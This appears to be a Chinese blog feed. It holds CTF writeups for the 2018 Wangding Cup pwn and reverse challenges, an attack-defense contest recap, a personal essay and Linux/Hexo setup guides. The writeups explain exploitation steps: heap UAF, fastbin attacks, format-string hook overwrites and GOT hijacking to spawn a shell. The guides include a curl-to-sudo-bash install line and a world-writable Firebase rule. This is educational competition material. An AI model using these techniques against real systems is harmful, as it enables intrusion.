[WDB-2018] 网鼎杯Bin题部分writeup

[WDB-2018] 网鼎杯Bin题部分writeup /ctf/wdb-2018/ 说明

此writeup包含4场网鼎杯大部分bin题，exp和二进制文件见附录

场次

day1

RE

beijing, advanced, blend

PWN

guess, blind, babyheap, heylow, heylow2, hangman, easycoin

day2

RE

give_a_try, game, martricks, rua

PWN

fmt, fgo, hvm, memffle

day3

RE

最好的语言, SimpleSMC, babyre, i_like_pack

暂无i_like_back的二进制文件

PWN

note, note2, soEasy, pesp

day4

RE

chaoyang, compenc, dalao

PWN

impossible, ipowtn, ipowtn2

RE

beijing

脑洞题

把bytedump出来拿到
s = ‘aLgYi)nBb\reqf4j\xc6m\x8al\x7f{\xaez\x92}\xec_W’
通过函数调用顺序得到下列序号
a=[6, 9, 0, 1, 0xa, 0, 8, 0, 0xb, 2, 3, 1, 0xd, 4, 5, 2, 7, 2, 3, 1, 0xc]
s.find(‘f’), l, a, g得到[12, 18, 0, 2]
猜测flag为

s = 'aLgYi)nBb\reqf4j\xc6m\x8al\x7f{\xaez\x92}\xec_W'
a=[6, 9, 0, 1, 0xa, 0, 8, 0, 0xb, 2, 3, 1, 0xd, 4, 5, 2, 7, 2, 3, 1, 0xc]
ret = ''
for i in a:
    ret += s[i*2]
print(ret)

advanced

blend

give_a_try

game

martricks

rua

PWN

guess

程序存在栈溢出，同时fork了3次，也就是nc一次可以猜测3次flag，这3次程序的地址都不会发生变化

考虑通过stack smashing detected leak数据

第一次覆盖argv为got表地址，leak出libc的地址，计算出environ的位置

第二次覆盖其为environ的地址，leak出栈的地址，计算出flag的位置

第三次直接覆盖为flag的位置，计算出flag的值

guess1

blind是一个堆题，只允许malloc(0x68)的chunk，存在UAF，但是没有leak函数

考虑通过fastbin attack申请到bss段的内存，从而在bss段上伪造stdout的结构体以及其虚表，让他指向system(“/bin/sh”)，从而getshell

伪造的stdout如图

blind1

伪造的虚表如图

blind

babyheap

UAF，只允许malloc(0x20)的chunk

在leak出堆的地址后，用fastbin attack修改现有chunk信息，可根据下图构造出unlink的条件

babyheap1

触发unlink后可以去除edit的次数限制，以及任意地址写，很容易leak出libc的基址，最后修改__malloc_hook为one_gadget即可

heylow & heylow2

程序比较大，但是有一个格式化字符串的漏洞，当输入出错时会触发报错，这时候会触发格式化字符串漏洞

直接修改__free_hook为one_gadget然后使字符串很长触发malloc和free即可

heylow与heylow2的区别在于heylow2只允许printf小于0x4f的字符串，然而payload只要51 byte

所以一个payload可以打2个题

hangman

暂空

easycoin

暂空

fmt

本题存在格式化字符串漏洞

fmt1

修改got表为system然后printf/bin/sh即可getshell

fgo

堆题，存在UAF

fgo1

可以看到在free后指针并没有清空

覆盖函数指针为printf后leak出libc地址

随后覆盖为system地址即可getshell

hvm

这题是个虚拟机，逆向opcode结果为

rax x1
rbx x2
rcx x3
rdx x4
rsi x5
rdi x6

07 00 00 00 
6F 0A 00 00 push 0xa6f

07 00 00 00 
68 65 6C 6C push 0x6c6c6568 // push hello

0C 00 00 00 mov x5, stackptr // hello

18 00 00 00 
00 00 00 01 mov x6, 0x1

04 00 00 00
00 00 00 06 mov x4, 0x6

01 00 00 00
00 00 00 01 mov x1, 0x1

0E 00 00 00 syscall

14 00 00 00 push pcoffset

05 00 00 00
00 00 00 0E jmp next 0xe // jmp tag

07 00 00 00 
00 00 00 00 push 0

07 00 00 00
62 79 65 0A push 0xa657962 //bye\n

0C 00 00 00 mov x5, stackptr

18 00 00 00 
00 00 00 01 mov x6, 0x1

04 00 00 00 
00 00 00 06 mov x4, 0x6

01 00 00 00 
00 00 00 01 mov x1, 0x1

0E 00 00 00 syscall

19 00 00 00 exit(0)

10 00 00 00 push stackbase // tag

11 00 00 00 mov stackbase, stackptr

0F 00 00 00 
00 00 00 30 sub stackptr, 0x30

0C 00 00 00 mov x5, stackptr

18 00 00 00
00 00 00 00 mov x6, 0x0

04 00 00 00
00 00 00 F0 mov x4, 0xf0

01 00 00 00
00 00 00 00 mov x1, 0

0E 00 00 00 syscall

12 00 00 00 mov stackptr, stackbase

13 00 00 00 pop stackbase

06 00 00 00 jmp [stackptr]+3; pop //ret

发现其虚拟栈上存在栈溢出

看源码发现虚拟代码段和虚拟栈都是mmap出来的

gdb调试发现buf_addr = stack_addr + 0x2000

考虑栈溢出将返回地址指向虚拟栈上，自己写入opcode后执行execve(‘/bin/sh’, NULL, NULL)

memffle

题目要求输入组数据，并对其进行随机排序，可以输入无数个数据导致栈溢出

其中随机数生成使用了

srand(time(0));

若是在连接的同时本地也以当前时间作为种子，若是时间是同步的话，本地也可以生成和远程相同的随机队列。

逆向后可以得到生成随机序列的算法为

def srand():
    libc['srand'](libc['time'](0))

def rand():    
    return libc['rand']()
# 生成乱序序列
def shuffling(n):
    srand()
    ret = []
    for i in xrange(n):
        ret.append(i)
    for i in xrange(n):
        j = n - i - 1
        v = rand() % (j + 1)
        ret[j],  ret[v] = ret[v], ret[j]
    return ret

查看read函数发现其末尾没有置零，同时还存在1byte的溢出

可以在输入名字时把buff填满从而leak出canary

发现题目送了1byte的system的地址

通常system地址为0xf7abcdef 其中def固定，给出了bc，可以爆破出剩下的半byte的地址

直接rop即可

note

note2

soEasy

pesp

附录

暂空

]]> ctf writeup [WDB-offline-2018] 网鼎杯-2018线下记录 /ctf/wdb-offline-2018/ 说明

此writeup包含两天的pwn题，exp和二进制文件见附录

正文

这次线下并没有以CNSS来打，而是以DURA（Dianzikeji University Retired Ailliance）来打的。然而因为操作失误，把CNSS挤出了半决赛。。。。

不得不吐槽这次线下，比当时强网杯操蛋多了，怎么打个ctf还要断网的呢？？？怎么这check这么不靠谱的。

Day1

Day1开场测试交题时发现zz icq给的接口居然有2s的cd，mmp，最后还是通过直接从平台抓包拿的接口交题的，不然永远在retry。被逼无奈只能把3个pwn和一个web的exp全部写在同一个py里面，统一交题，可以说是非常的蛋疼了。事实上解决这种问题的最好方法应该是写一个中心服务器，拿到flag就post给中心服务器，最后由中心服务器统一提交flag。

Day1可以说是打的心累，据说还有pwnable.tw的原题，然而我并没有做到，我好菜啊，差点被挤出决赛圈。同时午饭又冷又难吃，可以说是伙食最差的一场线下了。

Day2

苟进决赛圈后，据说第二天是AWD+CTF，第一次见到3小时这么养生的线下。公告上说第二天有sm3，sm4的加密，并没有复盘day1的题，结果第二天一看，4个题，3pwn 1web，同时1pwn 1web是原题，jbdxbl。不知道为啥，第一天的脚本死都打不通，到比赛结束前半小时才发现由于主办方换了启服务的方式，将socat换成了xinetd，leak时本来用的recv(8)是没问题的，到了第二天就炸了，原因是recv不保证接收到8个字符，改成recvuntil或者想办法保证收到8个字符就没事了。。。。感觉亏了1k分….

除此之外，Day2的ctf全都是crypto，可以快乐摸鱼了，然而一个题都没做出来。事后问SJTU的师傅才知道是凯撒，我好菜啊orz。

感谢老大的帮助，最后终于苟进前15，终于有路费了orz

后记

说实话，这场线下题目质量不是很行。又有原题，其它题题目难度也不高，同时堆题一点检查都没有，把free给nop掉后居然还能过check，和强网杯的check强度根本没法比。

除了题目不太行以外，这一场线下有一堆诡异的事情，我明明pwn题都修好了，怎么还能被打进来的？？？？打进来就算了，怎么隔几轮打一次一点规律都没有的。。。事后了解到一些师傅都把pwn删了还能被拿走flag，怕不是打的ssh 0day哦。不得不说你们icq是真的厉害，是真的毒瘤。想到了最后几轮那几个服务全红还能一轮加400分，上分速度比eee还高，突然明白了什么。。。。。不愧是**任务，rbq，rbq。关于此事知乎上也有很多讨论，也不想吐槽了。。。

不过这次还是踩了几个坑，一个是题目的libc是2.17，还是RedHat的，本机不知道啥原因根本无法调试，堆题只能凭感觉打，还好比较简单，还是做出来了。这时才意识到需要魔改一下pwndbg让heap那几个命令能脱离符号表工作，不然下次碰上没符号表的libc只能等死了…..

同时这场并没有提供流量包，通防之前说要造然而到现在都没有造出来，感觉这记录流量+通防这坑需要填一下了….

说到底还是自己太菜了，看看隔壁长亭的exp师傅一个人打4个orz，太吓人了。。。

Writeup

pwn题的后缀为ip

Day1

pwn22

由于在删除friend时并没有将userList中的指针置空从而导致了UAF

day1-pwn22-1

可以把自己当成朋友add后再delete自己，通过查看自己信息来leak出libc的基址

随后再注册一个账户，设置名字长度为0x128来获得之前free的chunk，可以把name设置为got表。

由于已经leak了，got表的值是已知的，登录第一个账户后修改用户信息即可修改got表为system，从而getshell

由于check很水，patch只要在plt让free直接ret即可。

pwn24

这题可以对pointer进行加减操作，并且还能打印rbq[pointer]的值和修改rbq[pointer]的值

day1-pwn24-1

由于可以++ –当pointer为负数时会导致它指向got表，从而leak数据+修改got表getshell

patch只需要在read前加个检查即可

pwn25

pwn25有两个洞，一个是delete mark时会导致double free，另一个则是edit_mark时存在堆溢出..

由于堆上有函数指针，并不考虑去走double free，因为太好修复了，打的堆溢出的洞，并没有使用到free。

day1-pwn25-1

结构体如图

首先可以先通过写满0x40 byte，由于没有\x00截断，可以leak出函数指针，既程序基址

有了程序基址就可以通过覆盖markInfo来进行任意leak和任意地址写

Day2

pwn23为第一天的pwn24

pwn24

没有技术含量的栈溢出，直接覆盖返回地址为system即可

pwn25

还是栈溢出

day2-pwn25-1

可以先覆盖fd为0，从而读入的内容可以控制，随后栈溢出即可

附录

题目以及exp：wdb-2018-offline.zip

]]> ctf writeup 过去，现在，将来？ /essay/some-thoughts-about-now/ 不要吐槽文笔，我也很绝望啊

从16年9月到现在已经8个月了，想当初刚来UESTC时还信誓旦旦的说自己一定会参加ACM，如今却和一条咸鱼差不多，现在来看，怕是如今的水平都不如高一刚参加NOIP时。

上星期和队友一起撸了12小时题后，也就撸了5题，侥幸进入决赛，还获得了一条咸鱼T恤

然而决赛的5个小时中也就做了个签到题以及一个tle的E题，虽然没有之前APIO爆0那么可怕，但是还是感觉到自己已经离ACM这条路越来越远。要说这次决赛的收获的话怕是只有一个咸鱼的签到气球以及让我更好的审视自己。

回看这几个月，该过的四级没过，线代学的和屎一样，虽然进了凝聚，希望在pwn发展，然而现在不过是一个stack overflow都没有完全掌握的咸鱼，更不用说堆溢出，更别说现在挖的一堆坑：UDP打洞，dockker，内核源码，js，Qt，感觉完全看不到尽头。现在也就魔改了一下blog，把去年挖的blog的坑给填上了，这有怎样呢

现在校赛结束了，最后也就61名，感觉是所有队伍中最咸鱼的了，对于几个月后的暑假集训是否要参加也是一脸懵逼（怕是报名的资格都没有）

现在自己越来越急躁，以前能静下心来刷刷题，高一时还能刷刷OJ，看看书，如今连一个英文文档都读不下去，什么都不想干，拖延症越来越重，说好的每天跑步到现在一次都没有践行。

现在的话，也就现在凝聚这呆着吧。当时初中自学的一些逆向虽然在现在看起来不值得一提，但是还是感觉相比ACM，我还是更加喜欢ctf里的东西。至于ACM，感觉和NOI这一类竞赛一样更像一场赌博吧，虽然学校对其待遇甚高但是同时也要面对更大的压力。如果有空的话就去ACM看看，或许还能捞个奖？（做梦呢）

在UESTC，大佬多，废物也多，这话看起来并不是十分的政治正确，但是不想变成废物那只有成为大佬。

自勉

以上

]]> essay git代理设置 /linux/configure-git-proxy/ 在天朝，由于某些原因，国人访问github的速度异常的慢，尤其是使用git clone项目时。

git目前支持4种协议，git，ssh，http，https，可以通过配置这四种协议的代理来加速git的使用。

本文默认浏览者使用linux系统并且拥有代理服务器

代理ssh协议

安装connect-proxy

sudo apt install connect-proxy

修改ssh设置

mkdir ~/.ssh
nano ~/.ssh/config

然后在文件最后加入

Host github.com *github.com
ProxyCommand connect-proxy -H 127.0.0.1:8118 %h %p
User git

此处仅支持http代理服务器，请根据自身情况修改地址与端口

上面的配置会通知ssh，在连接github.com和*.github.com时使用代理，用户为git，并配置代理命令

connect-proxy的作用为使用127.0.0.1:8118作为http proxy，透过代理服务器建立一个指向 %h:%p 的socket，并将其重定向到stdin，stdout中

代理http协议

bash中输入

git config --global http.proxy 'socks5://127.0.0.1:1080'

若代理服务器为http，则改为http://，代理服务器地址以及端口请自行变换

以下设置同上

代理https协议

git config --global https.proxy 'socks5://127.0.0.1:1080'

代理git协议

这个协议比较少见，仅作记录

git config --global core.gitproxy '/path/to/gitproxy'

其中/path/to/gitproxy为一个脚本，可使用connect-proxy来实现

#!/bin/sh
#
# Proxy wrapper for git protocol (9418).
#
# git config --global core.gitproxy "ido gitproxy"
#
exec connect-proxy -H 127.0.0.1:8118 $1 $2

]]> linux linux下配置shadowsocks客户端 /linux/configure-ss-client/ 安装shadowsocks

sudo apt install python3
sudo apt install python3-pip
pip3 install shadowsocks

创建配置文件

新建一个ss.json

输入

{
	"server" : "ip",
	"server_port" : 443,
	"local_port" : 1080,
	"password" : "passwd",
	"timeout" : 600,
	"method" : "chacha20"
}

保存

启动shadowsocks

sslocal -c ss.json

这样shadowsocks就在1080端口开放了

pac设置

如果设置全局代理，往往会导致访问国内网站变慢，于是需要设置pac代理

安装genpac并配置pac文件

pip3 install genpac
genpac --proxy="SOCKS5 127.0.0.1:1080" --gfwlist-proxy="SOCKS5 127.0.0.1:1080" -o autoproxy.pac --gfwlist-url="http://www.woodbunny.com/gfwlist.txt"

设置代理

之后在设置-网络-网络代理中，自动代理目录中输入pac目录路径即可

例：file:///home/plusls/ss/autoproxy.pac

浏览器设置

在浏览器的代理设置中使用系统代理即可

设置http代理

由于一些软件只支持http协议，我们需要安装privoxy来将http协议转为socks5

安装并配置privoxy

sudo apt-get install privoxy
sudo gedit /etc/privoxy/config

在gedit中查找

forward-socks5t

去掉前面的#并修改为

forward-socks5t   /               127.0.0.1:1080

再次查找

listen-address  127.0.0.1:8118

去掉前面的# 保存文件后输入

service privoxy start

若是终端需要代理，输入

export https_proxy=http://127.0.0.1:8118
export http_proxy=http://127.0.0.1:8118
export ftp_proxy=http://127.0.0.1:8118

即可

]]> linux linux下配置shadowsocks服务端 /linux/configure-ss-server/ 安装shadowsocks

sudo apt install python3
sudo apt install python3-pip
pip3 install shadowsocks

创建配置文件

新建一个ss.json

输入

{
    "server":"0.0.0.0",
    "server_port":443,
    "local_address":"127.0.0.1",
    "local_port":1080,
    "password":"yourpassword",
    "timeout":300,
    "method":"chacha20",
    "fast_open": false
}

保存

一般443端口哦都用于提供https服务，server_port 设置为443也许能减少被gfw干掉的概率（反正是玄学）

启动shadowsocks

ssserver -c ss.json -d start

]]> linux ssh配置 /linux/configure-ssh/ 本文用于记录一些常用的ssh配置

免密码登陆 vps

对于经常连接vps的人，每次都需要输入密码是非常无趣的事，可以通过生成生成公钥私钥，免密码使用ssh连接vps

假设A为本地主机，B为被控机器，欲连接的用户为user ip：1.1.1.1

A的命令

# 生成公钥私钥 可以指定私钥的密码以及生成位置
# 默认生成到 ~/.ssh/id_rsa.pub ~/.ssh/id_rsa
ssh-keygen -t rsa
# 在B创建.ssh文件夹并设置权限为700（本用户可读可写可执行，需要输入B机器密码）
ssh user@1.1.1.1 "mkdir .ssh; chmod 0700 .ssh" 
#考虑到B机器可能已经存在了公钥，仅复制公钥到被控机器（需要输入B机器密码）
scp ~/.ssh/id_rsa.pub user@1.1.1.1:~/.ssh/id_rsa.pub

B的命令

# 设置authorized_keys权限为600（本用户可读可写）
chmod 600 ~/.ssh/authorized_keys
# 避免覆盖原有公钥，将公钥追加在authorized_keys尾部
cat  ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys

效果

A机器可直接用ssh连接B机器不用输入密码，若是需要制定别的私钥文件，用参数**-i**即可

避免ssh连接因超时闲置断开

在使用ssh时，常常因为长时间不操作而被服务器踢出，解决这种问题一般有两种方法

方法1

只需在客户端电脑上编辑/etc/ssh/ssh_config，修改ServerAliveInterval的值为60

若ServerAliveInterval不存在，只需执行

echo "ServerAliveInterval 60" >> /etc/ssh/ssh_config

之后本机连接任何服务器都会保持连接

（需要root权限）

方法2

只需在服务器上编辑/etc/ssh/ssh_config，修改ClientAliveInterval的值为60

若ClientAliveInterval不存在，只需执行

echo "ClientAliveInterval 60" >> /etc/ssh/ssh_config

（需要root权限）

重启ssh server后该设置会生效

但是每个连接到此服务器的客户端都会受影响，启用后服务器安全性可能会下降（比如忘记登出）

]]> linux 搭建ngrok服务器 /linux/deploy-ngrok-server/ ngrok已经不再维护了，建议使用frp

如今ipv4资源日渐匮乏，静态公网ip不容易获取，若是想从公网访问本机资源将会变得比较麻烦，ngrok可以通过流量转发来实现内网穿透，让外网更加容易访问本机资源。

准备

一个有固定公网ip的服务器
一个域名
把某个子域名以及其泛解析解析到服务器

例：将ngrok.plusls.com解析为1.2.3.4

并将*.ngrok.plusls.com解析为1.2.3.4

生成可执行文件

下载源码

git clone https://github.com/inconshreveable/ngrok.git

生成自签名证书

生成证书需要提供一个NGROK_BASE_DOMAIN，要求该地址指向服务器地址，在本次的例子中则是ngrok.plusls.com，若是NGROK_BASE_DOMAIN与连接时提供的域名不同，则无法连接

执行

NGROK_BASE_DOMAIN="ngrok.plusls.com"
openssl genrsa -out rootCA.key 2048
$ openssl req -x509 -new -nodes -key rootCA.key -subj "/CN="${NGROK_BASE_DOMAIN} -days 5000 -out rootCA.pem
openssl genrsa -out device.key 2048
openssl req -new -key device.key -subj "/CN="${NGROK_BASE_DOMAIN} -out device.csr
openssl x509 -req -in device.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out device.crt -days 5000

执行完成后会生成device.crt，divice.csr，device.key，rootCA.key，rootCA.pem，rootCA.srl

ngrok会把ngrok源码下的assets目录编译到ngrokd和ngrok中，assets/client/tls和assets/server/tls下分别存放着客户端和服务器的默认证书文件，接下来把它们替换为刚才生成的

cp rootCA.pem assets/client/tls/ngrokroot.crt
cp device.crt assets/server/tls/snakeoil.crt
cp device.key assets/server/tls/snakeoil.key

编译

在ngrok目录执行

make release-server release-client

配置

服务端

ngrokd -domain="ngrok.plusls.com"

若出现

[03/29/17 20:51:30] [INFO] [registry] [tun] No affinity cache specified
[03/29/17 20:51:30] [INFO] [metrics] Reporting every 30 seconds
[03/29/17 20:51:30] [INFO] Listening for public http connections on [::]:80
[03/29/17 20:51:30] [INFO] Listening for public https connections on [::]:443
[03/29/17 20:51:30] [INFO] Listening for control and proxy connections on [::]:4443

则说明启动成功

注：

domain不一定是刚刚的，可以是其它的，但是必须解析到服务器上
可以用-httpAddr=":80"指定web转发的端口，如果不为80则访问时需要加上端口号

客户端

将生成的ngrok下载到电脑后，在主目录创建.ngrok（默认配置文件位置，也可以用-config=xxxx指定配置文件）

输入

server_addr: "ngrok.plusls.com:4443"
trust_host_root_certs: false
tunnels:
  ssh:
    remote_port: 221
    proto:
      tcp: 22
  web:
    subdomain: hahahah
    proto:
      http: 80

子域名，端口，目标端口可自行配置

server_addr必须与前面相同！否则无法连接服务器

之后执行

./ngrok start-all

若是看到

ngrok                                                                                       (Ctrl+C to quit)
                                                                                         
Tunnel Status                 online                                                     
Version                       1.7/1.7                                                     
Forwarding                    xxxx:xxx -> xxxx:xxx

则说明成功

其它指令可以自行查看帮助

]]> linux linux开机启动项设置 /linux/run-programs-on-startup/ 添加自定义启动脚本

在使用linux时常常需要自己写一些脚本程序使之开机启动，这时就要借助/etc/rc.local这个文件来帮助我们完成这个任务

关于 rc.local

rc.local快要被废弃了

下面是rc.local中的注释

This script is executed at the end of each multiuser runlevel.Make sure that the script will “exit 0” on success or any other value on error.
In order to enable or disable this script just change the execution bits.
By default this script does nothing.

简单来讲rc.local中将会放置使用者自定义的开机启动程序，在linux启动的最后阶段，系统将会执行其中的在exit 0之前的命令

添加启动项

知道rc.local的作用后，添加开机启动项将会变得轻而易举

下面是例子：

开机执行命令

希望开机的时候启动shadowsocks，只需要在exit 0前面添加

sslocal -c ss.conf

开机执行脚本

希望开机执行’/home/plusls/ss.sh’，只需在exit 0前添加（需保证该脚本有可执行权限）

/home/plusls/ss.sh

设置服务开机启动

这里的服务指 sysV 编写的启动脚本

关于服务

与windows一样，linux同样存在服务的概念，控制服务运行的脚本，存放于/etc/init.d中

查询服务状态

通过service servicename status查看服务状态

例：

plusls@plusls-chromebook:~$ sudo service l2tpd  status
● xl2tpd.service - LSB: layer 2 tunelling protocol daemon
   Loaded: loaded (/etc/init.d/xl2tpd; generated; vendor preset: enabled)
   Active: inactive (dead)
     Docs: man:systemd-sysv-generator(8)

设置服务状态（对于debian系的系统）

可以通过service servicename status来设置服务状态，status一般包括start,restart,stop（设置的状态仅对当前有效）

例：

service sshd stop

禁用服务开机启动

例:

update-rc.d -f apache2 remove

参数-f是强制删除符号链接

增加服务开机启动

例:

update-rc.d apache2 defaults

]]> linux Hexo 博客搭建 /misc/use-hexo-with-github-actions/ 旧博客已经很久没更新了，考研结束重新回到CS的生活后，发现自己自从博客停更后就停止了学习，和同龄人之间的差距越来越大了。为了激励自己，我决定重开博客，慢慢将旧博客的文章迁移到hexo上。

这篇文章用于记录折腾hexo的过程。

折腾完 Github Action 后的效果如下：

每次push后都会自动部署

安装nodejs

curl -sL https://deb.nodesource.com/setup_13.x | sudo -E bash -
sudo apt-get install -y nodejs

npm换源以及配置npm模块安装位置（可选）

个人一直比较反感将模块安装到root权限的目录，于是更改了node模块的安装目录

npm config set registry https://registry.npm.taobao.org
npm config set prefix ${HOME}/.npm_packages

配置后npm的模块会被安装到${HOME}/.npm_packages，可执行文件会在${HOME}/.npm_packages/bin下

因此需要更新PATH，根据个人用的shell修改.bashrc或者.zshrc

export PATH="$HOME/.npm_packages/bin:$PATH"

安装hexo并初始化博客

npm install -g hexo-cli
hexo init blog

执行后会在当前目录下新生成一个blog目录，里面包含了生成博客所需要的数据

博客的配置文件为_config.yml

写完博客后可以先在本地进行预览

hexo generate
hexo server

可以访问127.0.0.1:4000对博客进行预览

个人配置

隐藏index.html

pretty_urls:
  trailing_index: false # Set to false to remove trailing 'index.html' from permalinks
  trailing_html: false # Set to false to remove trailing '.html' from permalinks

目录结构

hexo默认是把文章全都塞_posts下，为了方便整理博文，我手动为博文建立了不同的目录用于分类

plusls@hyperv-debian > ~/github/blog/source > tree
.
├── categories
│   ├── index
│   └── index.md
├── CNAME
├── _data
│   └── next.yml
└── _posts
    ├── misc
    │   └── use-hexo-with-github-actions.md
    └── windows
        └── kms
            ├── configure-kms-server.md
            └── use-kms-server.md

默认情况下hexo的url是按照日期来生成的, 若是按照我这样分类博文，并修改配置文件

permalink: :title/

以use-kms-server这篇博文为例，它最后生成的url为

https://blog.plusls.com/windows/kms/configure-kms-server/

大大的提高了可读性，被搜索引擎索引后链接也会比较好看

启用资源文件夹

https://hexo.io/zh-cn/docs/asset-folders

主要为了解决附件，图片存放的问题

图片以及附件

在启用资源文件夹后把图片和资源扔进去，就可以在markdown内直接使用markdown语法进行引用

但是存在一个问题，一般引用资源文件夹的图片时都使用的相对目录，一个图片能在博文页面正常显示，但是在主页的摘要中就会挂掉

网上的搜索结果基本上都指向了hexo-asset-image这个插件，但是这个插件在隐藏掉index.html后会出现bug

我fork到自己仓库后魔改了一下，好像能正常工作，未经过完整的测试

可以使用如下命令安装我修改后的插件

npm install github:plusls/hexo-asset-image --save

解决渲染非markdown文件的问题

hexo在开启资料文件夹后，仍然会渲染资料文件夹内的文件，目前已知会渲染js, css, json，github上已经有人针对这个问题提了issue

https://github.com/hexojs/hexo/issues/1490

看起来官方不打算解决的样子

临时的解决方案为，修改_config.yml

skip_render:
  - _posts/**/*.js
  - _posts/**/*.css
  - _posts/**/*.json

让博文的url变得有意义

以use-hexo-with-github-actions这篇文章为例，它的url为 https://blog.plusls.com/misc/use-hexo-with-github-actions/

我希望能让 https://blog.plusls.com/misc/ 也变得有意义，能访问相应的category

只需要保证博文中的category设置正确

categories:
  - [misc]

若是博文存放在source\_posts\aaaa\bbbb\cccc.md

则博文中的category需要修改为

categories:
  - [aaaa, bbbb]

随后修改_config.yml

category_dir: ''

更换主题

默认主题真的8行，看了一圈，最后还是决定使用next: https://github.com/theme-next/hexo-theme-next

为了方便主题的更新以及缩小博客git仓库的体积，使用了submodule，顺便把默认主题删了

git submodule add https://github.com/theme-next/hexo-theme-next themes/next

clone结束后把_config.yml的theme修改为next即可

next主题配置

为了方便主题的更新，我并没有直接修改主题目录下的配置，而是将配置文件复制到了

source/_data/next.yml

启用categories

个人感觉next的tag比较鸡肋，并未启用，只启用了categories

hexo new page categories

新建categories page后修改source/categories.md，加上type: "categories"

同时修改next.yml

menu:
  home: / || home
  about: /about/ || user
  #tags: /tags/ || tags
  categories: /categories/ || th
  archives: /archives/ || archive
  #schedule: /schedule/ || calendar
  #sitemap: /sitemap.xml || sitemap
  #commonweal: /404/ || heartbeat

本来打算使用 Disqus，考虑到它被墙了，又不放心国内的评论系统，最后选择了 gitalk

Gitalk 是基于 github 的 issue 系统做的，它要求用户评论时先用 github 登录，用户评论就相当于在我博客的 issue 区评论， Gitalk 会自动化的把评论提交到 issue 以及从 issue 区域爬取评论显示在博文下面

Gitalk 使用了github 的 OAuth，因此需要注册一个 Github application

链接：https://github.com/settings/applications/new

Homepage URL 和 Authorization callback URL填写自己博客的地址，剩下的随意

注册完成后会来到如下页面，把 client_id 和 client_secret 填到next主题的配置文件即可

样例配置：

gitalk:
  enable: true
  github_id: plusls # GitHub repo owner
  repo: plusls.github.io # Repository name to store issues
  client_id: xxxxxx # GitHub Application Client ID
  client_secret: xxxxxxx # GitHub Application Client Secret
  admin_user: plusls # GitHub repo owner and collaborators, only these guys can initialize gitHub issues
  distraction_free_mode: true # Facebook-like distraction free mode
  # Gitalk's display language depends on user's browser or system environment
  # If you want everyone visiting your site to see a uniform language, you can set a force language value
  # Available values: en | es-ES | fr | ru | zh-CN | zh-TW
  language:

配置完成后打开博文会发现，博文下方提示 issues not found.

这是因为该博文的对应的 issue 还没有创建，登陆后需要亲自遍历所有博文来为每个博文创建issue

创建后的 issue 类似下图

每篇博文都会有个对应的 issue

访问量统计

本来想使用 firebase 结果发现被墙了

而且 firebase 有个坑点，需要把数据库配置为公开的，根据文档进行操作：

https://firebase.google.com/docs/database/security/quickstart?hl=zh-cn#sample-rules

规则如下：

rules_version = '2';
service cloud.firestore {
  match /databases/{database}/documents {
    match /{document=**} {
      allow read, write: if true;
    }
  }
}

尝试用了一下 busuanzi 它的统计好像有点问题，只能在 post 页面显示，在主页显示不出，最后决定使用 leancloud_visitors

教程：

https://github.com/theme-next/hexo-theme-next/blob/master/docs/zh-CN/LEANCLOUD-COUNTER-SECURITY.md

next 的杂七杂八的配置

仅作记录，具体怎么配置可查阅文档：https://theme-next.iissnan.com/theme-settings.html

谷歌分析
头像以及头像旋转
社交信息，比如 Github，Email
字数统计
代码块配置
github banner
favicon
友链没使用next自带的，自己新建了一个页面
捐赠
menu badges
SEO
license

github pages

在新建一个仓库，名字为plusls.github.io

修改仓库设置如下

随后将blog.plusls.com CNAME 到 plusls.github.io，即可使用blog.plusls.com访问github pages（白嫖大成功）

git deploy

自动部署博客到github pages，安装插件hexo-deployer-git

修改配置_config.yml：

# Deployment
## Docs: https://hexo.io/docs/deployment.html
deploy:
  type: git
  repo: git@github.com:plusls/plusls.github.io.git
  branch: master

配置好后命令行输入hexo deploy会自动部署博客到github pages

由于该插件每次都会初始化一个新的git仓库并push到远端，这个操作会覆盖掉仓库原有的CNAME文件。可以提前在source目录下放置CNAME，hexo会自动将其拷贝到网站的根目录下。

Github Action

终于到正题了，我这人有点懒，并不想写完博客后还要手动去执行hexo deploy，考虑使用Github Action，让我在写完博文push后自动部署

新建文件.github/workflows/deploy.yml

name: Deploy Hexo

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        node-version: [10.x]

    steps:
      - name: Pull code
        uses: actions/checkout@v2
        with:
          submodules: true

      - name: Configure Node.js ${{ matrix.node-version }}
        uses: actions/setup-node@v1
        with:
          node-version: ${{ matrix.node-version }}

      - name: Install Hexo CI
        run: |
          export TZ='Asia/Shanghai'
          npm i -g hexo-cli
          npm i

      - name: Install plugin
        run: |
          npm install hexo-deployer-git --save
          npm install github:plusls/hexo-asset-image --save
          echo install success

      - name: Configure git
        env:
          ACTION_DEPLOY_KEY: ${{ secrets.GITHUB_ACTION }}
        run: |
          mkdir -p ~/.ssh/
          echo "$ACTION_DEPLOY_KEY" > ~/.ssh/id_rsa
          chmod 600 ~/.ssh/id_rsa
          ssh-keyscan github.com >> ~/.ssh/known_hosts
          git config --global user.name "plusls"
          git config --global user.email "pluslslsulp@gmail.com"

      - name: Deploy
        run: |
          hexo clean
          hexo g
          hexo deploy
          rm ~/.ssh/id_rsa

Github Action的教程网上也有，但是没几个教程有说明怎么让git免密码push

首先ssh-keygen生成私钥和公钥，随后将公钥放到plusls.github.io的settings\Deploy Keys，名字随便起一个就好了

私钥则要放在博客的github仓库的settings\secrets，名字必须为GITHUB_ACTION，因为上面的脚本是通过secrets.GITHUB_ACTION来获取私钥并写入 ~/.ssh/id_rsa的

live2d

老婆！

在 hexo 使用 live2d 看板娘十分方便，安装 hexo-helper-live2d 插件即可

作者自带的模型中并没有 Sagiri，去网上随便找了个扔在 /live2d_models，跟着文档改改配置就能用了

# Live2D
## https://github.com/EYHN/hexo-helper-live2d
live2d:
  enable: true
  # enable: false
  scriptFrom: local # 默认
  pluginRootPath: live2dw/ # 插件在站点上的根目录(相对路径)
  pluginJsPath: lib/ # 脚本文件相对与插件根目录路径
  pluginModelPath: assets/ # 模型文件相对与插件根目录路径
  # scriptFrom: jsdelivr # jsdelivr CDN
  # scriptFrom: unpkg # unpkg CDN
  # scriptFrom: https://cdn.jsdelivr.net/npm/live2d-widget@3.x/lib/L2Dwidget.min.js # 你的自定义 url
  tagMode: false # 标签模式, 是否仅替换 live2d tag标签而非插入到所有页面中
  debug: false # 调试, 是否在控制台输出日志
  model:
    # use: live2d-widget-model-wanko # npm-module package name
    use: sagiri # 博客根目录/live2d_models/ 下的目录名
    # use: ./wives/wanko # 相对于博客根目录的路径
